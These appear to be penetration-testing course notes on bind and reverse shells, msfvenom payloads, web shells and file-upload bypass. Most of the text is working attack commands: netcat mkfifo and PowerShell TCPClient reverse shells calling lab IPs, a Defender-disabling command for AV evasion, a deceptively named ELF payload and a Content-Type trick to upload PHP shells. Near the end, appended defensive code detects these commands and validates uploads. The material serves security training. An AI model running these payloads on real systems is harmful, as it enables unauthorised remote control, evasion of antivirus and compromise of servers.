Shells and Payloads

Shell Basics

Bind Shells

In many cases, we will be working to establish a shell on a system on a local or remote network. This means we will be looking to use the terminal emulator application on our local attack box to control the remote system through its shell. This is typically done using a Bind and/or Reverse shell.

Once connected to the target box with SSH, start a Netcat listener:

nc -lvnp 7777

On the attack box, connect to the target:

nc -nv 10.129.41.200 7777

The above shows that we can use Netcat to send text between the client and server, but this is not a bind shell because we cannot interact with the OS and file system. We are only able to pass text through the pipe set up by Netcat. On the server side, we need to specify the directory, shell, listener, some pipelines, and input and output redirection to ensure a shell to the system gets served when the client attempts to connect. This code is considered our payload, and here we deliver it manually:

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

Now we use Netcat from the attack box to connect to the server:

nc -nv 10.129.41.200 7777

Reverse Shells

With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection. We will often use this kind of shell as we come across vulnerable systems because it is likely that an admin will overlook outbound connections, giving us a better chance of going undetected. We can start a Netcat listener on our attack box:

sudo nc -lvnp 443

On Windows, we can use this one-liner. Don't forget to change the IP address and port.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

However, this is usually blocked by AV software, so we can disable AV and try to connect again.

Set-MpPreference -DisableRealtimeMonitoring $true

Payloads

A Netcat/Bash reverse shell one liner

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

A PowerShell one-liner

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

With MSFvenom, we can use the command msfvenom -l payloads to list all the available payloads. Once you see a payload you like, build it with:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

Remember to have a Netcat listener running to catch the callback from the payload.

Besides the vectors of web drive-by, phishing emails, or dead drops, Windows hosts can provide us with several other avenues of payload delivery. The list below includes some helpful tools and protocols for use while attempting to drop a payload on a target:

- Impacket: a toolset built in Python that provides us a way to interact with network protocols directly. The tools we care about most in Impacket deal with psexec, smbclient, wmi, Kerberos and the ability to stand up an SMB server.
- Payload All The Things: a great resource for quick one-liners to help transfer files between hosts quickly.
- SMB: can provide an easy-to-exploit route to transfer files between hosts.
- Remote execution via MSF
- Other protocols: FTP, TFTP, HTTP/S

With Meterpreter's shell command we can drop into a system shell and work on the target as if we were logged in with a CMD.exe console open. From there we can check whether Python is installed on the system:

meterpreter > shell

which python

To get a TTY shell with Python:

python -c 'import pty; pty.spawn("/bin/sh")'
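As an added defensive example (not part of the original notes), the script below runs simple detection rules over constructed process-creation log lines that mirror the netcat bind/reverse shell one-liner, the PowerShell TCPClient one-liner, the Defender-disabling command and the pty upgrade shown on this page; the log format and rule names are assumptions.

```python
import re

# Constructed process-creation log lines in the form "<ts> user=<u> cmd=<cmdline>";
# they imitate the commands shown on this page and are not from a real host.
SAMPLE_LOG = """\
2024-01-01T10:00:01 user=www-data cmd=rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
2024-01-01T10:00:05 user=alice cmd=nc -zv db.internal 5432
2024-01-01T10:01:00 user=bob cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)"
2024-01-01T10:01:30 user=bob cmd=powershell Set-MpPreference -DisableRealtimeMonitoring $true
2024-01-01T10:02:00 user=alice cmd=python -c 'import pty; pty.spawn("/bin/sh")'
2024-01-01T10:03:00 user=alice cmd=ls -la /var/www
"""

# Each rule: (finding name, compiled pattern applied to the command line only).
RULES = [
    # mkfifo ... <shell> -i ... nc : the named-pipe netcat shell (bind or reverse)
    ("netcat named-pipe shell",
     re.compile(r"mkfifo\s+\S+.*\b(?:bash|sh)\s+-i\b.*\bnc\b")),
    # TCPClient plus iex/Invoke-Expression in one command: the PowerShell one-liner
    ("powershell tcpclient shell",
     re.compile(r"System\.Net\.Sockets\.TCPClient.*\b(?:iex|Invoke-Expression)\b", re.I)),
    # Defender real-time protection switched off
    ("defender realtime monitoring disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    # pty.spawn used to upgrade a dumb shell to a TTY
    ("pty shell upgrade",
     re.compile(r"\bpty\.spawn\(")),
]

LINE_RE = re.compile(r"^(\S+)\s+user=(\S+)\s+cmd=(.*)$")

def parse_line(line):
    """Split one log line into (timestamp, user, command line); None if malformed."""
    m = LINE_RE.match(line)
    return m.groups() if m else None

def scan(log_text):
    """Return a list of (timestamp, user, finding) for every rule that fires."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, user, cmd = rec
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((ts, user, name))
    return hits
```

Running scan(SAMPLE_LOG) yields four findings; the plain port probe and the directory listing produce none.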

Web Shells

Laudanum

The Laudanum files can be found in the /usr/share/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you first edit the file to insert your attacking IP address, to ensure you can access the web shell or receive a callback, depending on the shell. First copy a shell from the laudanum folder to a working folder and add your IP address to the allowedIps variable on line 59.

cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx

Then upload the file and browse to it on the web server. Sometimes you need to add a "\\" to your paths.

Antak

Antak is a web shell built in ASP.NET that uses PowerShell to interact with the host. The files can be found in the /usr/share/nishang/Antak-WebShell directory. Don't forget to add a username and password to the web shell, on line 14.

PHP Web Shell

Since PHP processes code and commands on the server side, we can use pre-written payloads to gain a shell through the browser or initiate a reverse shell session with our attack box. However, this time the target application (rConfig) checks the file type before accepting the upload. So we can use Burp Suite to bypass the file restrictions. We do this by changing the Content-Type from application/x-php to image/gif.
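As an added example from the defender's side (not rConfig's code and not part of the original notes), this upload check shows why the Content-Type swap described above is not a bypass against a server that ignores the header; the extension allowlist and magic-byte table are assumed policy for the example.

```python
import re
import secrets

# Magic bytes each allowed image extension must start with (assumed policy for this example).
ALLOWED_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Any PHP open tag anywhere in the body: an image header prepended to script is still refused.
PHP_TAG = re.compile(rb"<\?")

def validate_upload(filename, content_type, data):
    """Decide whether an upload is stored.

    Returns (True, server_side_name) or (False, reason). content_type is
    accepted only to show that it plays no part: it is client-controlled,
    so rewriting application/x-php to image/gif changes nothing here.
    """
    del content_type  # deliberately unused: never a basis for trust
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    # Exactly one extension: shell.php.gif and similar double extensions are refused.
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be <name>.<ext>"
    ext = parts[1]
    if ext not in ALLOWED_MAGIC:
        return False, f"extension .{ext} is not permitted"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, f"body does not start with a {ext} header"
    if PHP_TAG.search(data):
        return False, "body contains a PHP open tag"
    # Never reuse the client's name on disk; assign a random one with the vetted extension.
    return True, f"{secrets.token_hex(8)}.{ext}"
```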